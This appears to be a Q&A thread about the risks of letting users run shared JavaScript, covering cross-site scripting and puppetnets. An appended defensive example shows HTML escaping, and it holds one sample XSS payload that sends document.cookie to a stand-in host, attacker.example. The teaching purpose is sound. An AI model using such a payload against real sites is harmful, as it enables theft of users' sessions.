I'm considering allowing users to input JavaScript in web pages and letting them share those pages with other users. What's the worst that can happen? Is there any way I can make it 'safe'?

+1  A: 

It depends. If you place the JavaScript in a text box, it is just text; you can share text, we do that here. If you put the mechanics in to store the text into a .js file and automatically attach those to a page, you might have severe problems. More explanation might be good here.

Mark Schultheiss
+2  A: 

are you making something like this:

http://jsbin.com/

mkoryak
Nah, I'm making a web-based game engine.
Skofo
+4  A: 

As mentioned by others, if the JavaScript is only displayed to other users and not run, it would be perfectly safe (not taking into account users manually running the code, of course).

If, however, the code is run, then some bad things can happen. One pretty bad thing that can happen is that your site is used to form a so-called puppetnet. Puppetnets are similar to botnets but utilize browsers instead, and single puppets may therefore be relatively short-lived (which distinguishes puppetnets from botnets). Puppetnets can be used for distributed denial of service attacks, worm propagation, spamming and more.

More about puppetnets can be found at http://www.cs.ucsd.edu/groups/sysnet/miscpapers/puppetnets-ccs06.pdf.

Mikael Auno
That's quite interesting! And scary. Thank you.
Skofo
+4  A: 

What can happen has a name: Cross-Site Scripting. Basically, you are allowing a (malicious) user Mallory to run a piece of code in the context of another (victimized) user Alice.

Here's a paper for preventing that from happening in ASP.Net.

If you want to share the content, not the behavior, of those JS snippets, that's another story. In that case, you should make sure that, when sending the response to Alice containing code posted by Mallory, it is appropriately enclosed as text NOT to be parsed and executed.

Here's another paper that goes through the many twists this issue has.

Ariel
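As an added example (not code from this thread or from any of the answerers), the following JavaScript shows the difference Mark Schultheiss and Ariel are drawing between sharing a snippet as text and letting it become part of the page. The `<pre class="snippet">` wrapper, the function names, and the sample "Mallory" snippet (which points at the hypothetical host `attacker.example`) are all assumptions made for the illustration.

```javascript
// Added example: rendering a user-supplied JavaScript snippet so that Alice's
// browser treats it as text, not as markup to parse and execute.
// Runs under Node.js or in a browser; nothing here touches the network.

// Escape the five characters that let text break out of an HTML text node or
// attribute value. Every other character can pass through unchanged.
function escapeHtml(str) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// UNSAFE rendering: the snippet is spliced into the response as raw markup.
// If it contains a </pre> followed by a <script>, the script runs in Alice's
// browser with her cookies and session: exactly the XSS Ariel describes.
function renderUnsafe(snippet) {
  return `<pre class="snippet">${snippet}</pre>`;
}

// SAFE rendering: the snippet is escaped first, so the browser builds a text
// node inside <pre>. The code is visible to Alice but never executed.
function renderSafe(snippet) {
  return `<pre class="snippet">${escapeHtml(snippet)}</pre>`;
}

// Constructed sample (not from the thread) of what Mallory might post as a
// "JavaScript snippet": it closes the wrapper and injects a cookie-stealing
// script pointing at a hypothetical attacker-controlled host.
const mallorySnippet =
  '</pre><script>fetch("https://attacker.example/?c=" + document.cookie)</script><pre>';

// Check used by the tests: does anything that parses as a tag survive inside
// our wrapper? Strips the fixed wrapper and looks for "<" followed by a tag
// name or "/" (a closing tag).
function containsMarkup(html) {
  const open = '<pre class="snippet">';
  const close = '</pre>';
  const inner = html.slice(open.length, -close.length);
  return /<[a-zA-Z/]/.test(inner);
}

// Demonstration when run directly.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderUnsafe(mallorySnippet));
  console.log('safe:  ', renderSafe(mallorySnippet));
  console.log('unsafe contains markup:', containsMarkup(renderUnsafe(mallorySnippet)));
  console.log('safe contains markup:  ', containsMarkup(renderSafe(mallorySnippet)));
}
```

When building the page in the browser rather than on the server, the equivalent of `renderSafe` is assigning the snippet to an element's `textContent` (never `innerHTML`); the browser then performs the same text-node treatment without any escaping on your side. Escaping is only the answer for showing the code; if the code must actually run for your game engine, nothing in this example makes that safe.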